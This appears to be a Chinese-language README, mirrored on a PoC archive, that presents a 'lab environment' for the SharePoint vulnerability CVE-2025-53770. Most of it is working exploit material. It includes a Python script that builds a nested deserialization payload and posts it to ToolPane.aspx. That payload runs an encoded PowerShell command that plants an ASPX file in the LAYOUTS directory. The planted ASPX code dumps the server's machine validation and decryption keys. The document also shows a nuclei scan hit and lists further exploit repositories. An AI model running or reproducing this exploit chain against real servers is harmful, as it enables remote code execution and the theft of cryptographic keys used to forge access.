关联漏洞
描述
CVE-2025-53770 实验环境
介绍
# sharepoint-CVE-2025-53770
CVE-2025-53770 实验环境
安装教程:
https://www.cnblogs.com/jianyus/p/9874010.html
https://www.cnblogs.com/life512/p/13713483.html
https://www.cnblogs.com/cqpanda/p/16148822.html
https://vladilen.com/content/sharepoint-keys
https://blog.csdn.net/liuzhenhe1988/article/details/112938419
测试:
https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.10
```
└─$ ./nuclei -t http/cves/2025/CVE-2025-53770.yaml -u http://192.168.139.143
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-53770] [http] [critical] http://192.168.139.143/_layouts/15/ToolPane.aspx/?DisplayMode=Edit&a=/ToolPane.aspx
[INF] Scan completed in 3.408841065s. 1 matches found.
```
上传:
```
import base64
import gzip
import urllib.parse
import requests
def BuildPayload(APSXPayloadFile: str):
def Step1(APSXPayloadFile):
with open(APSXPayloadFile, 'rb') as apsxp:
Payload = apsxp.read()
PayloadEncoded = base64.b64encode(Payload)
return PayloadEncoded
def Step2(PayloadEncoded):
PowerShellPayload = f"""
$base64String = {PayloadEncoded}
$destinationFile = "C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx"
$decodedBytes = [System.Convert]::FromBase64String($base64String)
$decodedContent = [System.Text.Encoding]::UTF8.GetString($decodedBytes)
$decodedContent | Set-Content -Path $destinationFile -ErrorAction Stop
"""
PowerShellPayloadBase64Encoded = base64.b64encode(bytes(PowerShellPayload, 'utf-8')).decode('utf-8')
PowerShellPayloadExecuterCommand = f"powershell -EncodedCommand {PowerShellPayloadBase64Encoded}"
return PowerShellPayloadExecuterCommand
def Step3(PowerShellPayloadExecuterCommand):
PowerShellPayloadExecuterCommandBase64Encoded = base64.b64encode(bytes(PowerShellPayloadExecuterCommand,'utf-8')).decode('utf-8')
Payload = f'<pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" ><ExpandedElement/><ProjectedProperty0><MethodName>Deserialize</MethodName><MethodParameters><anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string"> {PowerShellPayloadExecuterCommandBase64Encoded}</anyType></MethodParameters><ObjectInstance xsi:type="LosFormatter"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfLosFormatterObjectDataProvider></pwn>'
PayloadBase64Encoded = base64.b64encode(bytes(Payload, 'utf-8')).decode('utf-8')
PayloadGunziped = gzip.compress(bytes(PayloadBase64Encoded, 'utf-8'))
return PayloadGunziped
def Step4(PayloadGunziped):
PayloadGunzipedBase64Encoded = base64.b64encode(PayloadGunziped).decode('utf-8')
FinalPayload = f'<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %><%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %><asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest"><ProgressTemplate><div class="divWaiting"><Scorecard:ExcelDataSet CompressedDataTable="{PayloadGunzipedBase64Encoded}" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet></div</ProgressTemplate></asp:UpdateProgress>'
FinalPayloadURLEncoded = urllib.parse.quote(FinalPayload)
return FinalPayloadURLEncoded
PayloadFileEncoded = Step1(APSXPayloadFile)
#print(f"\nPayload File Base64 Encoded: {bytes(PayloadFileEncoded).decode('utf-8')}")
PowerShellPayloadEncoded = Step2(bytes(PayloadFileEncoded).decode('utf-8'))
#print(f"\nPowerShell Payload Base64 Encoded: {PowerShellPayloadEncoded}")
PayloadGzipped = Step3(PowerShellPayloadEncoded)
#print(f"\nPayload GZipped: {PayloadGzipped}")
#PayloadUnGzipped = gzip.decompress(PayloadGzipped)
#print(f"\nPayload Un Gzipped: {PayloadUnGzipped.decode('utf-8')}")
FinalPayloadURLEncoded = Step4(PayloadGzipped)
#print(f"\nFinal Payload URL Encoded: {FinalPayloadURLEncoded}")
return FinalPayloadURLEncoded
def BuildHTTPRawRequest(TargetSite, TargetSiteSchema, UserAgent, Payload):
RawRequest = f"""
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: {TargetSite}
User-Agent: {UserAgent}
Accept: */*
Referer: /_layouts/SignOut.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(Payload)}
MSOTlPn_Uri={urllib.parse.quote(f"{TargetSiteSchema}{TargetSite}")}&MSOTlPn_DWP={urllib.parse.quote(Payload)}
"""
return RawRequest
def RunAttack(TargetSite, TargetSiteSchemaPrefix, UserAgent, Payload):
headers = {
'User-Agent': UserAgent,
'Referer': '/_layouts/SignOut.aspx',
'Content-Type': 'application/x-www-form-urlencoded',
}
data = {
'MSOTlPn_Uri': f'{TargetSiteSchemaPrefix}{TargetSite}',
'MSOTlPn_DWP': Payload,
}
response = requests.post(
f'{TargetSiteSchemaPrefix}{TargetSite}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx',
headers=headers,
data=data,
verify=False,
)
return response.text
def Start(TargetSite, TargetSiteSchemaPrefix, UserAgent, PayloadFilePath):
Payload = BuildPayload(PayloadFilePath)
RawHTTPRequest = BuildHTTPRawRequest(TargetSite, TargetSiteSchemaPrefix, UserAgent, Payload)
print(f"\n {'-'*10} PoC Request {'-'*10}\n {RawHTTPRequest}")
if __name__ == "__main__":
TargetSite = 'example.com'
PayloadFilePath = 'pwn.aspx'
TargetSiteSchemaPrefix = "http://"
UserAgent = "example/0.0.0"
Start(TargetSite, TargetSiteSchemaPrefix, UserAgent, PayloadFilePath)
```
利用
```
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
public void Page_load()
{
var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
}
</script>
```
链接:
https://hawktrace.com/blog/cve-2025-53772
https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
https://github.com/hazcod/CVE-2025-53770
https://github.com/exfil0/CVE-2025-53770/tree/main
https://github.com/soltanali0/CVE-2025-53770-Exploit/tree/main
https://github.com/unk9vvn/sharepoint-toolpane
https://github.com/3a7/CVE-2025-53770/tree/main
https://github.com/saladin0x1/CVE-2025-53770
文件快照
[4.0K] /data/pocs/533e929966f6942861233eb09c2019e3b1c29371
└── [7.6K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。